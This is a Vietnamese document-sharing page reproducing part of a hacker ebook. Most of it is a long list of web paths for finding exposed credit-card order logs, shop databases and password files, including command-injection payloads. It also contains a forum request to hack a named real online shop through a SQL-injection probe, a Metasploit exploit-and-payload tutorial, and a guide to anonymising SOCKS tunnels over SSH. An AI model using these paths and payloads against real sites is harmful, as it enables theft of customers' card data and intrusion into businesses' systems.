1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 106 doc

6 454 1

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 163,18 KB

Nội dung

/wwwlog /cool-logs/mlog.html /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi /cgi-bin/pagelog.cgi /cgi-bin/orders/cc.txt /cgis/shop/orders/orders.txt /admin/admin_conf.pl /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log /Admin_files/ccelog.txt /cgi-bin/orders/mc.txt /cgi/cart32.exe /ecommerce/admin/admin.asp /scripts/DCShop/auth_data/auth_user_file.txt /Catalog/config/datasources/Expire.mdb /ecommerce/admin/shopdbtest.asp /mysql/mystore.mdb /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping.asp /cgi-bin/commercesql/index.cgi?page= /admin/files/order.log /cgi-bin/Count.cgi?df=callcard.dat /logfiles/ /shopping/shopping350.mdb /admin/configuration.pl /cgis/DCShop/auth_data/auth_user_file.txt /cgis/cart32.exe /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/auth_user_file.txt /shopping400.mdb /HBill/config /cgi-bin/shop/index.cgi?page= /admin/files/order.log /search=action&keywords=GSD%20&template=order.log /WebCart/orders.txt /PDG_Cart/authorizenets.txt /cgi-bin/AnyForm2 /~gcw/cgi-bin/Count.cgi?df=callcard.dat /cgi-bin/PDG_Cart/order.log /expire.mdb /logger/ /webcart-lite/orders/import.txt /cgi-bin/commercesql/index.cgi?page= /admin/admin_conf.pl /cgi-bin/PDG_Cart/shopper.conf /cgi-bin/cart32.exe /dc/orders/orders.txt /cgi-local/DCShop/orders/orders.txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win/shop/orders/orders.txt /cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv /cgi-sys/DCShop/auth_data/auth_user_file.txt /cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der.log /scripts/orders/orders.txt /cgi-local/shop.pl/shop.cfg /search=action&keywords=cwtb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb /php-coolfile/action.php?action=edit&file=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp /ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html /search=action&keywords=cwtb%20&template=order.log /mysql/expire.mdb /scripts/shop/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /shop/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/log_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi- bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20 / /webcart/system/orders/orders.txt|&CODE=PHOLD;;; /cool-logs/mylog.html /cgibin/shop.pl/page=;cat%20shop.pl /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der1.txt /SHOP/shopdbtest.asp /cgi/pagelog.cgi /php/mlog.phtml /cgi-bin/shop/apdproducts.mdb /htbin/shop/auth_data/auth_user_file.txt /server%20logfile;;; /database/metacart.mdb /cgi-local/shop/orders/orders.txt Chỉ là đi copy rồi paste lại thôi , cả nhà thông cảm . Tiện đây nhờ bác nào cao tay làm thịt hộ con shop này : hxxp://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54' Khoai lòi mắt Saviola(vniss) Giới thiệu về Metasploit Metasploit Framework là một môi trường dùng để kiểm tra, viết và sử dụng các mã khai thác lỗi. Môi trường này cung cấp platform để kiểm tra sự thâm nhập, phát triển các shellcode và nghiên cứu, khám phá những lỗ hổng. Framwork được xây dựng từ ngôn ngữ hướng đối tượng Perl Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi. Sử dụng script msfupdate trong framework, bạn có thể download được các phiên bản Framework mới nhất từ website metasploit.com Metasploit có nhiều giao diện với người dùng: console interface: dùng msfconsole.bat để mở interface này. msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn, đặc biệt interface này còn hỗ trợ sử dụng phím tab để hoàn thành dòng lệnh giống như cisco IOS nên dễ sử dụng hơn cho người dùng Web interface: dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web Enviroment: có 2 Enviroment Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Bạn có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config và sẽ được load trở lại khi user interface được thực hiện Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên được xác định ở Global Enviroment vd: msf> setg LPORT 80 msf> setg LHOST 172.16.8.2 Sử dụng Framework 1. Chọn module exploit: lựa chọn chương trình, dịch vụ cần khai thác show exploits: xem các module exploit mà framework có hỗ trợ use exploit_name: chọn module exploit info exploit_name: xem thông tin về module exploit 2. Cấu hình module exploit đã chọn show options: Xác định những options nào cần cấu hình set : cấu hình cho những option của module đó Một vài module còn có những advanced options, bạn có thể xem bằng cách gõ dòng lệnh show advanceds 3. Verify những options vừa cấu hình: check: kiểm tra xem những option đã được set chính xác chưa. 4. Lựa chọn target: lựa chọn hệ diều hành nào để thực hiện show targets: những target được cung cấp bởi module đó set: xác định target nào vd: smf> use windows_ssl_pct show targets exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1 5. Lựa chọn payload payload là đoạn code mà sẽ chạy trên hệ thống target. show payloads: liệt kê ra những payload của module exploit hiện tại info payload_name: xem thông tin chi tiết về payload đó set PAYLOAD payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó show advanced: xem những advanced options của payload đó 6.Thực thi exploit exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác Viking - avnol Hung1910(HVA) SOck Private - sử dụng ssh và cosmopod.com - giới thiệu host dễ reg kèm ssh bài viết Tunnelier : chạy tốt , ko tốn băng thông , nhưng kiếm host hỗ trợ SSh lại quá cực khổ so với các bạn rùi sợ host live ko lâu :-SS bài viết về Cosmopod.com : chạy tốt dùng free cũng lướt web được , nhưng lại chậm do đường truyền ADSL. SAu một hồi kiểm tra đi kiểm tra lại , tớ viết tut này hội đủ tất cả ưu điểm - Các cậu download Bivise Tunnelier ở :http://www.bitvise.com/downloads/Tunnelier-Inst.exe Nếu muốn có sock bình thường Đăng kí acc free ở cosmopod.com sau đó các cậu install chương trình nhé !(nói hóm hỉnh 1 chút nào ) tớ cũng mày mò thiệt là kĩ cái này , 1 hồi mới nghĩ ra ,sao mình ko kết hợp cái của mình với cái của MVC ??!?!? > một cái bóng đèn hiện lên đầu (sáng kiến ).bắt đầu :

Ngày đăng: 04/07/2014, 11:20

TỪ KHÓA LIÊN QUAN